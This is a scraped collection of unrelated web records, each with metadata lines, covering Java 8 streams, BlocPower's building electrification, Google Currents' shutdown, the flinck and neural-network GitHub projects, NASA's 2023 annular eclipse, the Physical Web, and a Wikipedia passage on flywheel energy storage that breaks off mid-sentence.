p(m.values().toString().replace(",", "")); 64. 65. p("\nwords"); 66. p(getWordsLongerThan(3, words)); 67. p(getWordLengthsLongerThan(3, words)); 68. } 69. } ``` Sample output from running the program: ``` `````` Sentence : the quick brown fox jumped over the lazy dog Words : 9 Letters : 44 Letters : t, h, e, , q, u, i, c, k, , b, r, o, w, n, , f, o, x, , j, u, m, p, e, d, , o, v, e, r, , t, h, e, , l, a, z, y, , d, o, g Sorted : , , , , , , , , a, b, c, d, d, e, e, e, e, f, g, h, h, i, j, k, l, m, n, o, o, o, o, p, q, r, r, t, t, u, u, v, w, x, y, z Unique : , a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, t, u, v, w, x, y, z Counts letters a b c d e f g h i j k l m n o p q r t u v w x y z 8 1 1 1 2 4 1 1 2 1 1 1 1 1 1 4 1 1 2 2 2 1 1 1 1 1 words quick | brown | jumped | over | lazy 5 | 5 | 6 | 4 | 4 ``` The code has been shortened several different ways. Not all are possible in every version of Java, and not all are consistent with generally accepted style guides.Consider how this output would be obtained in earlier versions of Java. Several local variables would have been created to temporarily store data or serve as indexes. Numerous conditional statements and loops would be required to tell Java *how* to process the data. The newer functional approach is focused on *what* data is needed, and does not require attention related to temporary variables, nested loops, index management or conditional statement processing. In some instances, standard Java syntax available since the earliest versions of the language was used to shorten the code at the expense of clarity. For instance, the Java Packages in the standard import statement in line 1 references all classes in java.util rather than each individual class by name. The call to System.out.println is replaced with a call to a method named p to allow a shorter name on each method invocation (lines 9-11). These changes are controversial as they would violate some Java coding standards, but programmers from other backgrounds would not necessarily view them with any concern. In other cases, we take advantage of features that were not available in the earliest versions of the language, but have been available since pre-JDK8. Static imports (lines 3-5) are used to reduce the number of class references needed inline. Regular expressions (lines 10,45) effectively hide looping and conditionals in manner unrelated to functional programming per se. These idioms, particularly the use of Regular Expressions are often challenged for being difficult to read and interpret. Used judiciously, they reduce the amount of noise and restrict the amount of code that needs to read and interpreted by a developer. Finally, the code takes advantage of the new JDK 8 streaming API. A number of methods available in the streaming API are used to filter, group and process the lists (lines 17-40). Though their association with enclosing classes is clear within an IDE, it is less obvious unless you are already conversant with the API. This list explains where each of the method calls that appear in the code originate. | | stream() | java.util.Collection.stream() | sorted() | java.util.stream.Stream.sorted() | collect() | java.util.stream.Stream.collect() | toList() | java.util.stream.Collectors.toList() | groupingBy() | java.util.stream.Collectors.groupingBy() | identity() | java.util.function.Function.identity() | counting() | java.util.stream.Collectors.counting() | filter() | java.util.stream.Stream.filter() | mapToInt() | java.util.stream.Stream.mapToInt() | mapToObject() | java.util.stream.Stream.mapToObject() | The uniq() (line 13) and sort() (line 17) methods reflect the functionality of the unix utilities with the same name. Sort introduces the first call to a stream which is sorted and then collected into a List. UniqueCount() (line 21) is analogous to uniq –c and returns a map in which each key is a character and each value is a count of the number of times that character appears. The two “getWords” methods (line 26 and 33) filter out words that are shorter than a given length. In the case of the getWordLengthsLongerThan() additional method calls are used to format and cast the results into a final String. The code does not introduce any new concepts related to lambda expressions. The syntax introduced earlier is simply applied to specific use with the Java streams API. ## Conclusion The idea of writing less code to accomplish a given task is consistent with Einstein’s idea to: “make the irreducible basic elements as simple and as few as possible without having to surrender the adequate representation of a single datum of experience.” This has been more popularly quoted as “Make things as simple as possible, but not simpler”. Lambda expressions and the new streams API are often highlighted due to new possibilities to write simplified code that scales well. They contribute to the programmers ability to properly simplify code to its best possible representation. Functional programming idioms are shorter by design, and with a little thought, there are many cases where Java code can be profitably made more succinct. The new syntax is unfamiliar but not overly complex. These new features clearly demonstrate that Java has moved far beyond its original goals as a language. It is now embracing some of the best functionality available to other programming languages and integrating them as its own. ## About the Author **Casimir Saternos** has worked as a Software Developer, Database Administrator and Software Architect over the past 15 years. He has recently written and created a screencast on the R programming language. His articles on Java and Oracle Technologies have appeared in Java Magazine and on the Oracle Technology Network. He is the author of Client-Server Web Apps with JavaScript and Java available from O'Reilly Media.
true
true
true
Unix pioneer Ken Thompson once said, “one of my most productive days was throwing away 1000 lines of code.” In this article Cas Saternos highlights practices now possible for writing concise Java code, with a special focus on the new functionality available in JDK 8. Shorter, more elegant code is possible due to the inclusion of Lambda Expressions in the language.
2024-10-12 00:00:00
2015-04-28 00:00:00
https://res.infoq.com/ar…limage/logo4.jpg
website
infoq.com
InfoQ
null
null
31,197,307
https://techcrunch.com/2022/04/28/blocpower-wants-to-evict-fossil-fuels-one-building-at-a-time/
BlocPower wants to evict fossil fuels one building at a time
Ron Miller
BlocPower founder Donnel Baird grew up in the Bedford-Stuyvesant neighborhood of Brooklyn in the 1980s. The area was so poor that buildings often lacked decent heating systems. People would turn on the stove or use electric heaters to compensate for ineffective central heating. It wasn’t safe or efficient, but it was reality for many families, most of whom were Black, living in these deficient buildings at the time. Baird says that the sense of inequity and inequality of the situation stuck with him. When he grew up, he recognized that the problem persisted in many poorer neighborhoods, impacting quality of life for the people living there as well as harming the broader environment. There was also another element at play. Many people living in these same neighborhoods faced a lack of decent jobs, fueling a cycle of poverty that was hard to break. Baird not only wanted to replace inefficient systems that burned fossil fuels, he also wanted to create high-quality, stable jobs for folks who were often left behind by the economy. He launched BlocPower in 2014 with the goal of replacing fossil fuel-burning heating and cooling systems with cleaner, more efficient electric air source heat pumps, water heaters and solar panels. As of January, BlocPower had updated more than 1,200 buildings in 26 cities, and the work continues. To this point, the company has raised over $100 million. That includes over $50 million from Goldman Sachs to help back the company’s green building financing, as well a $30 million investment from Microsoft’s Climate Innovation Fund. In spite of this, he faced an uphill battle when it came to fundraising, and came perilously close to shutting the company’s doors in 2018. I spoke to Baird about the challenges he faced launching the business, especially as a Black founder, convincing the financial sector and venture capitalists to back his vision and get his idea off the ground. ## Building a greener alternative The roots of the idea for what became BlocPower began when Baird was working on a green jobs program in conjunction with the Obama-era Department of Energy. “My job was to act as outside intermediary between the Department of Energy and a bunch of labor unions and pension funds to figure out if we could co-invest labor union pension funds to create jobs, greening buildings using stimulus funding,” he explained. They hoped to put unemployed union members to work updating buildings, but the technology was much more expensive in this 2009 time frame, and it proved difficult to make the economics work for everyone. When Baird was in graduate school in 2014, he began to explore the idea of creating a financial instrument to make it easier for more people to update buildings with green energy systems, particularly in poorer neighborhoods. He felt that the lack of a purpose-built financial instrument to finance these projects was the missing piece in bringing his vision to life, but it required financial institutions to provide external investments in neighborhoods that most banks and financial services companies tended to steer clear of. “That’s when I realized if I was going to do green buildings in low-income communities, I’d have to do it myself. And while I was in business school, I began writing up a business plan and halfway through business school, Cheryl Dorsey, the president of Echoing Green Foundation, gave me $100,000 of seed capital, and I was able to launch the company while in my second year,” Baird said. The company makes money in a couple of different ways today, starting with the financial instrument he based the company on when he came up with the idea in 2014. “We borrow money from Wall Street. We purchase the equipment and we identify the local contractor who’s qualified to install it. And then we manage the project as they install that equipment in the building (getting project management fees as part of the deal). And we lease the equipment, just like you lease a car, to the building owner for 10 years or 15 years or 20 years. And so there’s a stream of lease payments that come back to our company from that building owner,” Baird explained. That flow of payments gives the company predictable, recurring revenue. In addition, governments and utilities hire companies like BlocPower to encourage and help building owners update their heating and cooling systems. “Utility companies and local governments have budgets, and so they will pay us for greening buildings in their community,” he said. As an example, the company has a contract with the city of Ithaca, New York, to make every building in town green. “Building electrification is a major part of Ithaca’s Green New Deal, one of the most aggressive decarbonization programs in New York State. The program will benefit Ithaca residents through job creation, lower energy costs, reduced pollution and greenhouse gas emissions, and more energy-efficient homes and buildings,” the company wrote in a statement announcing the deal. ## Getting off the ground As he built the company, he wanted to get that external investment to help drive it, but before that could happen, he had to come up with a proof of concept, and the way he was able to do that was with some government contracts. The first was a $2 million grant from the Department of Energy. He also would close a $6 million, three-year deal in 2017 with New York City, but he found getting financial institutions involved proved more challenging. The company was able to take the grant monies from NYC and the Department of Energy and really show that with proper financial backing, it could begin to have a real impact greening buildings. “So we had a $2 million contract with the Department of Energy that my startup won in a competitive process. We used that money to construct a real-world portfolio of actual clean energy projects by greening like 40 buildings, and then we were able to submit the data that we generated to Goldman Sachs to see that our financial models were tracking with what we were seeing in the real world,” he said. As the company wrote in a report on the NYC project, which was called Community Retrofit NYC, it concentrated in poor areas in Brooklyn and Queens where the startup could work with the utility companies to help identify buildings that needed updating in these areas: BlocPower’s strategy was to engage community stakeholders who completed projects to refer building owners to the Community Retrofit NYC with a focus in areas with the most robust Con Edison incentives. The second step was to use data to build a targeting score to identify buildings in need of upgrades. Targeting, in partnership with leveraging existing relationships, allowed us to connect to building owners in need of upgrades. It also allowed us to build a persona of who our average building owner looks like. The original plan called for BlocPower to work with 554 properties, where it would initiate or ideally complete a project, but it was actually able to complete projects on 629 buildings over the three-year contractual period from 2017-2019, according to the company. It was able to make progress in a few key ways. First of all, once it got some building owners involved, there was a big word of mouth effect, and that helped get more owners on board. Secondly, using the company’s proprietary software, the team was able to identify buildings most in need of updating. Finally the startup also created a much more streamlined approach to project management using a digital model. “What building a digital model of the building allows us to do is basically create one web page, where we have the digital model of the building and all of its data, and we could integrate all of the disparate pieces of electrical engineering, mechanical engineering, construction and financial data into one digital profile for that building. That allows us to figure out what the financial returns would be from investing in green energy in that building,” he said. Meanwhile, he raised a couple of tranches of money from Andreessen Horowitz and Kapor Capital. The first was for $1 million in 2015 just after he started the company. The next was a $2 million bridge round, which Baird says might have saved the company at a time when he was struggling. The two firms were instrumental in helping the company get started and then stay in business, he said. ## Pushing ahead With the portfolio of projects under his belt from the DoE and NYC programs, it began to pry open some doors with some big investors, but it wasn’t easy, and it took years for it to come together. But last year, Goldman Sachs Asset Management Urban Investment Group provided the company with more than $50 million to finance more green building projects. But he hasn’t been able to get other banks and financial institutions to go along, and the frustration of fundraising has never really gone away. He says the company has 860 employees, a figure that includes almost 800 workers his company has trained to install green energy solutions. “They are our employees. We pay them, we supervise them, we project manage them. We do interesting projects, like we’ve decarbonized some churches and synagogues. We put solar panels on Rikers Island, the jail in New York City.” He says the latter project was particularly gratifying because some of the folks he hired had been incarcerated there at one time or another or knew people who were. “That was interesting because a lot of our workers have been locked up in Rikers Island, or had family members that had been locked up in Rikers Island, but they were able to go there and do something positive and get paid for working on Rikers Island,” he said. While he met people along the way who invested in his vision, he described fundraising in general as “horrific.” “I’ve had people get up and walk out of meetings. I’ve had people pull out their phone in the middle of my presentation and start checking it. I’ve had people lecture me on capitalism, and how BlocPower isn’t capitalist, and because we’re trying to help people, we’re never going to make any money.” And climate tech investors were no better, he said, with one in particular accusing Baird of outright lying when he presented the investor with data about his completed projects. He believes the only way to fix the financing problem is for people from underrepresented groups to gain capital and invest in one another. “We can’t wait around and hold our breath and say, ‘Oh George Floyd happened,’ so the venture capital category is going to follow through and change…They’re going to do what they do. Our job is to create a whole new cohort of people who can actually deliver the social impact change that we need, and deliver the change on climate that we need,” he said. In spite of the obstacles, BlocPower has come up with a way to make buildings more efficient, while creating good jobs and making life better in neighborhoods that are too often left behind, all while making money and doing right by the planet. Founders First Capital Partners brings a different approach to diversity investing
true
true
true
BlocPower launched in 2014 with the goal of replacing fossil fuel-burning heating and cooling systems with cleaner, more efficient green energy solutions.
2024-10-12 00:00:00
2022-04-28 00:00:00
https://techcrunch.com/w…?resize=1200,675
article
techcrunch.com
TechCrunch
null
null
4,707,696
https://plus.google.com/+ResearchatGoogle/posts/e7qgT37kd7j
New community features for Google Chat and an update on Currents
Google
Note: This blog post outlines upcoming changes to Google Currents for Workspace users. For information on the previous deprecation of Google+ for users with personal Google accounts, please see this post . What's Changing We are nearing the end of this transition. Beginning July 5, 2023, Currents will no longer be available. Workspace administrators can export Currents data using Takeout before August 8, 2023. Beginning August 8th, Currents data will no longer be available for download. Although we are saying goodbye to Currents, we continue to invest in new features for Google Chat , so teams can connect and collaborate with a shared sense of belonging. Over the last year, we've delivered features designed to support community engagement at scale, and will continue to deliver more. Here is a summary of the features with additional details below: This month, we’re enabling new ways for organizations to share information across the enterprise with announcements in Google Chat . This gives admin controls to limit permissions for posting in a space, while enabling all members to read and react, helping ensure that important updates stay visible and relevant. Later this year, we plan to simplify membership management by integrating Google Groups with spaces in Chat, enable post-level metrics for announcements, and provide tools for Workspace administrators to manage spaces across their domain. Announcements in Google Chat Managing space membership with Google Groups We’ve already rolled out new ways to make conversations more expressive and engaging such as in-line threading to enable rich exploration of a specific topic without overtaking the main conversation and custom emojis to enable fun, personal expression. In-line threaded conversations Discover and join communities with up to 8,000 members We’ve also made it easier for individuals to discover and join communities of shared interest . By searching in Gmail , users can explore a directory of available spaces covering topics of personal or professional interest such as gardening, pets, career development, fitness, cultural identity, and more, with the ability to invite others to join via link. Last year, we increased the size of communities supported by spaces in Chat to 8,000 members , and we are working to scale this in a meaningful way later this year. A directory of spaces in Google Chat for users to join. Our partner community is extending the power of Chat through integrations with essential third-party apps such as Jira, GitHub, Asana, PagerDuty , Zendesk and Salesforce . Many organizations have built custom workflow apps using low-code and no-code tools , and we anticipate that this number will continue to grow with the GA releases of the Chat API and AppSheet’s Chat app building capabilities later this year. For teams to thrive in this rapidly changing era of hybrid work, it’s essential to build authentic personal connections and a strong sense of belonging, no matter when or where individuals work. We will continue to make Google Chat the best option for Workspace customers seeking to build a community and culture for hybrid teams, with much more to come later this year. Who's impacted Admins and end users Why it’s important The transition from Currents to spaces in Google Chat removes a separate, siloed destination and provides organizations with a modern, enterprise-grade experience that reflects how the world is working today. Google Workspace customers use Google Chat to communicate about projects, share organizational updates, and build community. Recommended action Availability Spaces in Google Chat are available to all Google Workspace customers and users with personal Google Accounts. Resources
true
true
true
Note: This blog post outlines upcoming changes to Google Currents for Workspace users. For information on the previous deprecation of Googl...
2024-10-12 00:00:00
2023-04-12 00:00:00
https://blogger.googleus…_LINKS%20(2).png
article
googleblog.com
Google Workspace Updates
null
null
11,363,070
https://github.com/Kraymer/flinck
GitHub - Kraymer/flinck: Sort your movies on filesystem by dates, ratings, etc using symlinks.
Kraymer
/flingk/ 1.verb tr.to create a symlink to a movie (flick) 2.n.CLI tool to organize your movies into a browsable directory tree offering fast access by dates, imdb ratings, etc - smart extraction of movie name from its folder/file, use OMDB api to get infos - sane limited set of configuration options, yet highly flexible directories resulting structure - possible to split links into alphabetical buckets (A-C, D-F, etc) for large libraries flinck is written for Python 2.7 and Python 3. Install with pip via `pip install flinck` command. If you're on Windows and don't have pip yet, follow this guide to install it. ``` Usage: flinck.py [OPTIONS] FILE|DIR Organize your movie collection using symbolic links. Options: -l, --link_dir PATH Links root directory -b, --by [country|decade|director|genre|rating|runtime|title|year] Organize medias by... -v, --verbose --version Show the version and exit. -h, --help Show this message and exit. Example: flinck -l ./ --by genre --by rating ~/Movies ``` More infos on the documentation website `~/.config/flinck/config.yaml` corresponding to the screenshot above : : ``` link_root_dir: '/Volumes/Disque dur/Movies' genre: dirs: true buckets: true rating: link_format: %rating-%year-%title dirs: false buckets: true decade: dirs: true ``` Available on Github Releases page. Want to know when new releases are shipped? Subscribe to the Versions rss feed. Please submit bugs and features requests on the Issue tracker.
true
true
true
Sort your movies on filesystem by dates, ratings, etc using symlinks. - Kraymer/flinck
2024-10-12 00:00:00
2016-03-20 00:00:00
https://opengraph.githubassets.com/b48c194d079dfe0ab103051b87fa4da7c0f9a50110736223b9ee1225d1fce3bf/Kraymer/flinck
object
github.com
GitHub
null
null
5,451,014
http://www.techrepublic.com/downloads/quick-reference-linux-commands/172482
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
37,877,618
https://science.nasa.gov/eclipses/future-eclipses/eclipse-2023/
2023 Annular Eclipse - NASA Science
null
# 2023 Solar Eclipse An annular solar eclipse will cross North, Central, and South America. This eclipse will be visible for millions of people in the Western Hemisphere. ## Join us ### October ## Let's get ready ### On Oct. 14, Experience the Eclipse Join NASA experts for a live broadcast of the annular solar eclipse. Want to see more? At the link below, viewers can tune in on Oct. 14 for telescope livestreams across the path, rocket launches during the eclipse, and a broadcast in Spanish. On Oct. 14, 2023, an annular solar eclipse will cross North, Central, and South America. Visible in parts of the United States, Mexico, and many countries in South and Central America, millions of people in the Western Hemisphere can experience this eclipse. During an annular eclipse, it is never safe to look directly at the Sun without specialized eye protection designed for solar viewing. Review these safety guidelines to prepare for Oct. 14, 2023. ## Safety It is never safe to look directly at the Sun during an annular eclipse without wearing solar viewing or eclipse glasses. The Sun is never completely blocked by the Moon during an annular solar eclipse. Therefore, during an annular eclipse, it is never safe to look directly at the Sun without specialized eye protection designed for solar viewing. You can also use an indirect viewing method, such as a pinhole projector. ## What to Expect on Oct. 14 An annular solar eclipse happens when the Moon passes between the Sun and Earth while it is at its farthest point from Earth. Because the Moon is farther away from Earth, it appears smaller than the Sun and does not completely cover the star. This creates a “ring of fire” effect in the sky. Read More## Where & When Can I View the Annular Solar Eclipse? On Oct. 14, 2023, the annular eclipse will begin in the United States, traveling from the coast of Oregon to the Texas Gulf Coast Weather permitting, the annular eclipse will be visible in Oregon, Nevada, Utah, New Mexico, and Texas, as well as some parts of California, Idaho, Colorado, and Arizona. The annular eclipse will continue on to Central America, passing over Mexico, Belize, Honduras, and Panama. In South America, the eclipse will travel through Colombia before ending off the coast of Natal, Brazil, in the Atlantic Ocean. # Meet the Creators of NASA’s Newest Eclipse Art To celebrate the special role of eclipses in connecting art and science, creatives across NASA will be sharing their eclipse-inspired… Read the Story## More Ways to Experience the Eclipse ### Citizen Science Observing a solar eclipse is just one of many ways to get in on the fun of doing science – you can get involved with NASA science by participating in citizen science projects. ### Resources From downloadable posters to coloring sheets, and videos to interactive demos, there are tons of fun ways for the whole family to experience eclipses. ### Heliophysics Big Year The annular solar eclipse kicks off the Heliophysics Big Year – a global celebration of solar science and the Sun’s influence on Earth and the entire solar system.
true
true
true
On Oct. 14, 2023, an annular solar eclipse will cross North, Central, and South America. Visible in parts of the United States, Mexico, and many countries in South and Central America, millions of people in the Western Hemisphere can experience this eclipse. During an annular eclipse, it is never safe to look directly at the […]
2024-10-12 00:00:00
2022-10-12 00:00:00
https://science.nasa.gov…l_1-3.jpg?w=1024
null
nasa.gov
science.nasa.gov
null
null
38,565,489
https://pylaunch.com
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
18,756,832
https://github.com/ahmedbesbes/Neural-Network-from-scratch
GitHub - ahmedbesbes/Neural-Network-from-scratch: Ever wondered how to code your Neural Network using NumPy, with no frameworks involved?
Ahmedbesbes
In this repository, I will show you how to build a neural network from scratch (yes, by using plain python code with no framework involved) that trains by mini-batches using gradient descent. Check **nn.py** for the code. In the related notebook **Neural_Network_from_scratch_with_Numpy.ipynb** we will test nn.py on a set of non-linear classification problems - We'll train the neural network for some number of epochs and some hyperparameters - Plot a live/interactive decision boundary - Plot the train and validation metrics such as the loss and the accuracies nn.py is a toy neural network that is meant for educational purposes only. So there's room for a lot of improvement if you want to pimp it. Here are some guidelines: - Implement a different loss function such as the Binary Cross Entropy loss. For a classification problem, this loss works better than a Mean Square Error. - Make the code generic regarding the activation functions so that we can choose any function we want: ReLU, Sigmoid, Tanh, etc. - Try to code another optimizers: SGD is good but it has some limitations: sometimes it can be stuck in local minima. Look into Adam or RMSProp. - Play with the hyperparameters and check the validation metrics
true
true
true
Ever wondered how to code your Neural Network using NumPy, with no frameworks involved? - ahmedbesbes/Neural-Network-from-scratch
2024-10-12 00:00:00
2018-12-24 00:00:00
https://repository-images.githubusercontent.com/163014938/88f38c80-3f69-11ea-926a-2f6d7305536e
object
github.com
GitHub
null
null
23,771,131
https://www.runnaroo.com/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
37,494,400
https://open.spotify.com/episode/0svOPYZBP7yvR2YKbmmL6I
From Virtualization to AI Integration // Lamia Youseff // # 175
null
# From Virtualization to AI Integration // Lamia Youseff // # 175 MLOps.community Sep 2023 52 min 6 sec MLOps Coffee Sessions #175 with Lamia Youseff, From Virtualization to AI Integration. // Abstract Lamia discusses how both Fortune 500 companies and SMBs lack the knowledge and capabilities to identify which use cases in their systems can benefit from AI integration. She emphasizes the importance of helping these companies integrate AI effectively and acquire the necessary capabilities to stay competitive in the market.
true
true
true
MLOps.community · Episode
2024-10-12 00:00:00
2023-09-12 00:00:00
https://i.scdn.co/image/ab6765630000ba8a3143cdda5609225b79c79117
music.song
spotify.com
Spotify
null
null
8,428,596
http://google.github.io/physical-web/
Walk up and use anything
null
The Physical Web is an open approach to enable quick and seamless interactions with physical objects and locations. Everything is a tap away Walk up and interact with any object -- a parking meter, a toy, a poster -- or location -- a bus stop, a museum, a store -- without installing an app first. Interactions are only a tap away. See what’s useful around you See web pages associated with the space around you. Choose the page most useful to you. Any object or place can broadcast content When anything can offer information and utility, the possiblities are endless. How does this work? The Physical Web enables you to see a list of URLs being broadcast by objects in the environment around you. Any object can be embedded with a Bluetooth Low Energy (BLE) beacon, which is a low powered, battery efficient device that broadcasts content over bluetooth. Beacons that support the Eddystone protocol specification can broadcast URLs. Services on your device such as Google Chrome or Nearby Notifications can scan for and display these URLs after passing them through a proxy. Explore the Physical Web in 3 easy steps. Get beacons. On supported Android devices, you can use Beacon Toy to transform your phone into an Eddystone beacon. Otherwise, choose from a variety of beacon manufacturers. Configure beacons. You’ll have to select which URLs you’d like to broadcast (browsers such as Chrome and Nearby Notifications only support HTTPS) and how far and often you want your beacons to broadcast. Deploy. Place your beacons in a physical space. Anyone who passes by with a Physical Web-compatible service will see your URL.
true
true
true
Walk up and use anything
2024-10-12 00:00:00
null
null
null
null
null
null
null
11,626,875
https://en.wikipedia.org/wiki/Flywheel_energy_storage
Flywheel energy storage - Wikipedia
null
# Flywheel energy storage **Flywheel energy storage** (**FES**) works by accelerating a rotor (flywheel) to a very high speed and maintaining the energy in the system as rotational energy. When energy is extracted from the system, the flywheel's rotational speed is reduced as a consequence of the principle of conservation of energy; adding energy to the system correspondingly results in an increase in the speed of the flywheel. Most FES systems use electricity to accelerate and decelerate the flywheel, but devices that directly use mechanical energy are being developed.[1] Advanced FES systems have rotors made of high strength carbon-fiber composites, suspended by magnetic bearings, and spinning at speeds from 20,000 to over 50,000 rpm in a vacuum enclosure.[2] Such flywheels can come up to speed in a matter of minutes – reaching their energy capacity much more quickly than some other forms of storage.[2] ## Main components [edit]A typical system consists of a flywheel supported by rolling-element bearing connected to a motor–generator. The flywheel and sometimes motor–generator may be enclosed in a vacuum chamber to reduce friction and energy loss. First-generation flywheel energy-storage systems use a large steel flywheel rotating on mechanical bearings. Newer systems use carbon-fiber composite rotors that have a higher tensile strength than steel and can store much more energy for the same mass.[3] To reduce friction, magnetic bearings are sometimes used instead of mechanical bearings. ### Possible future use of superconducting bearings [edit]The expense of refrigeration led to the early dismissal of low-temperature superconductors for use in magnetic bearings. However, high-temperature superconductor (HTSC) bearings may be economical and could possibly extend the time energy could be stored economically.[4] Hybrid bearing systems are most likely to see use first. High-temperature superconductor bearings have historically had problems providing the lifting forces necessary for the larger designs but can easily provide a stabilizing force. Therefore, in hybrid bearings, permanent magnets support the load and high-temperature superconductors are used to stabilize it. The reason superconductors can work well stabilizing the load is because they are perfect diamagnets. If the rotor tries to drift off-center, a restoring force due to flux pinning restores it. This is known as the magnetic stiffness of the bearing. Rotational axis vibration can occur due to low stiffness and damping, which are inherent problems of superconducting magnets, preventing the use of completely superconducting magnetic bearings for flywheel applications. Since flux pinning is an important factor for providing the stabilizing and lifting force, the HTSC can be made much more easily for FES than for other uses. HTSC powders can be formed into arbitrary shapes so long as flux pinning is strong. An ongoing challenge that has to be overcome before superconductors can provide the full lifting force for an FES system is finding a way to suppress the decrease of levitation force and the gradual fall of rotor during operation caused by the flux creep of the superconducting material. ## Physical characteristics [edit]### General [edit]Compared with other ways to store electricity, FES systems have long lifetimes (lasting decades with little or no maintenance;[2] full-cycle lifetimes quoted for flywheels range from in excess of 105, up to 107, cycles of use),[5] high specific energy (100–130 W·h/kg, or 360–500 kJ/kg),[5][6] and large maximum power output. The energy efficiency (*ratio of energy out per energy in*) of flywheels, also known as round-trip efficiency, can be as high as 90%. Typical capacities range from 3 kWh to 133 kWh.[2] Rapid charging of a system occurs in less than 15 minutes.[7] The high specific energies often cited with flywheels can be a little misleading as commercial systems built have much lower specific energy, for example 11 W·h/kg, or 40 kJ/kg.[8] ### Form of energy storage [edit]Here is the integral of the flywheel's mass, and is the rotational speed (number of revolutions per second). ### Specific energy [edit]The maximal specific energy of a flywheel rotor is mainly dependent on two factors: the first being the rotor's geometry, and the second being the properties of the material being used. For single-material, isotropic rotors this relationship can be expressed as[9] where - is kinetic energy of the rotor [J], - is the rotor's mass [kg], - is the rotor's geometric shape factor [dimensionless], - is the tensile strength of the material [Pa], - is the material's density [kg/m 3]. #### Geometry (shape factor) [edit]The highest possible value for the shape factor[10] of a flywheel rotor, is , which can be achieved only by the theoretical *constant-stress disc* geometry.[11] A constant-thickness disc geometry has a shape factor of , while for a rod of constant thickness the value is . A thin cylinder has a shape factor of . For most flywheels with a shaft, the shape factor is below or about . A shaft-less design[12] has a shape factor similar to a constant-thickness disc (), which enables a doubled energy density. #### Material properties [edit]For energy storage, materials with high strength and low density are desirable. For this reason, composite materials are frequently used in advanced flywheels. The strength-to-density ratio of a material can be expressed in Wh/kg (or Nm/kg); values greater than 400 Wh/kg can be achieved by certain composite materials. #### Rotor materials [edit]Several modern flywheel rotors are made from composite materials. Examples include the carbon-fiber composite flywheel from Beacon Power Corporation[13] and the *PowerThru* flywheel from Phillips Service Industries.[14] Alternatively, Calnetix utilizes aerospace-grade high-performance steel in their flywheel construction.[15] For these rotors, the relationship between material properties, geometry and energy density can be expressed by using a weighed-average approach.[16] ### Tensile strength and failure modes [edit]One of the primary limits to flywheel design is the tensile strength of the rotor. Generally speaking, the stronger the disc, the faster it may be spun, and the more energy the system can store. (Making the flywheel heavier without a corresponding increase in strength will slow the maximum speed the flywheel can spin without rupturing, hence will not increase the total amount of energy the flywheel can store.) When the tensile strength of a composite flywheel's outer binding cover is exceeded, the binding cover will fracture, and the wheel will shatter as the outer wheel compression is lost around the entire circumference, releasing all of its stored energy at once; this is commonly referred to as "flywheel explosion" since wheel fragments can reach kinetic energy comparable to that of a bullet. Composite materials that are wound and glued in layers tend to disintegrate quickly, first into small-diameter filaments that entangle and slow each other, and then into red-hot powder; a cast metal flywheel throws off large chunks of high-speed shrapnel. For a cast metal flywheel, the failure limit is the binding strength of the grain boundaries of the polycrystalline molded metal. Aluminum in particular suffers from fatigue and can develop microfractures from repeated low-energy stretching. Angular forces may cause portions of a metal flywheel to bend outward and begin dragging on the outer containment vessel, or to separate completely and bounce randomly around the interior. The rest of the flywheel is now severely unbalanced, which may lead to rapid bearing failure from vibration, and sudden shock fracturing of large segments of the flywheel. Traditional flywheel systems require strong containment vessels as a safety precaution, which increases the total mass of the device. The energy release from failure can be dampened with a gelatinous or encapsulated liquid inner housing lining, which will boil and absorb the energy of destruction. Still, many customers of large-scale flywheel energy-storage systems prefer to have them embedded in the ground to halt any material that might escape the containment vessel. ### Energy storage efficiency [edit]Flywheel energy storage systems using mechanical bearings can lose 20% to 50% of their energy in two hours.[17] Much of the friction responsible for this energy loss results from the flywheel changing orientation due to the rotation of the earth (an effect similar to that shown by a Foucault pendulum). This change in orientation is resisted by the gyroscopic forces exerted by the flywheel's angular momentum, thus exerting a force against the mechanical bearings. This force increases friction. This can be avoided by aligning the flywheel's axis of rotation parallel to that of the earth's axis of rotation.[ citation needed] Conversely, flywheels with magnetic bearings and high vacuum can maintain 97% mechanical efficiency, and 85% round trip efficiency.[18] ### Effects of angular momentum in vehicles [edit]When used in vehicles, flywheels also act as gyroscopes, since their angular momentum is typically of a similar order of magnitude as the forces acting on the moving vehicle. This property may be detrimental to the vehicle's handling characteristics while turning or driving on rough ground; driving onto the side of a sloped embankment may cause wheels to partially lift off the ground as the flywheel opposes sideways tilting forces. On the other hand, this property could be utilized to keep the car balanced so as to keep it from rolling over during sharp turns.[19] When a flywheel is used entirely for its effects on the attitude of a vehicle, rather than for energy storage, it is called a reaction wheel or a control moment gyroscope. The resistance of angular tilting can be almost completely removed by mounting the flywheel within an appropriately applied set of gimbals, allowing the flywheel to retain its original orientation without affecting the vehicle (see *Properties* of a gyroscope). This does not avoid the complication of gimbal lock, and so a compromise between the number of gimbals and the angular freedom is needed. The center axle of the flywheel acts as a single gimbal, and if aligned vertically, allows for the 360 degrees of yaw in a horizontal plane. However, for instance driving up-hill requires a second pitch gimbal, and driving on the side of a sloped embankment requires a third roll gimbal. #### Full-motion gimbals [edit]Although the flywheel itself may be of a flat ring shape, a free-movement gimbal mounting inside a vehicle requires a spherical volume for the flywheel to freely rotate within. Left to its own, a spinning flywheel in a vehicle would slowly precess following the Earth's rotation, and precess further yet in vehicles that travel long distances over the Earth's curved spherical surface. A full-motion gimbal has additional problems of how to communicate power into and out of the flywheel, since the flywheel could potentially flip completely over once a day, precessing as the Earth rotates. Full free rotation would require slip rings around each gimbal axis for power conductors, further adding to the design complexity. #### Limited-motion gimbals [edit]To reduce space usage, the gimbal system may be of a limited-movement design, using shock absorbers to cushion sudden rapid motions within a certain number of degrees of out-of-plane angular rotation, and then gradually forcing the flywheel to adopt the vehicle's current orientation. This reduces the gimbal movement space around a ring-shaped flywheel from a full sphere, to a short thickened cylinder, encompassing for example ± 30 degrees of pitch and ± 30 degrees of roll in all directions around the flywheel. #### Counterbalancing of angular momentum [edit]An alternative solution to the problem is to have two joined flywheels spinning synchronously in opposite directions. They would have a total angular momentum of zero and no gyroscopic effect. A problem with this solution is that when the difference between the momentum of each flywheel is anything other than zero the housing of the two flywheels would exhibit torque. Both wheels must be maintained at the same speed to keep the angular velocity at zero. Strictly speaking, the two flywheels would exert a huge torqueing moment at the central point, trying to bend the axle. However, if the axle were sufficiently strong, no gyroscopic forces would have a net effect on the sealed container, so no torque would be noticed. To further balance the forces and spread out strain, a single large flywheel can be balanced by two half-size flywheels on each side, or the flywheels can be reduced in size to be a series of alternating 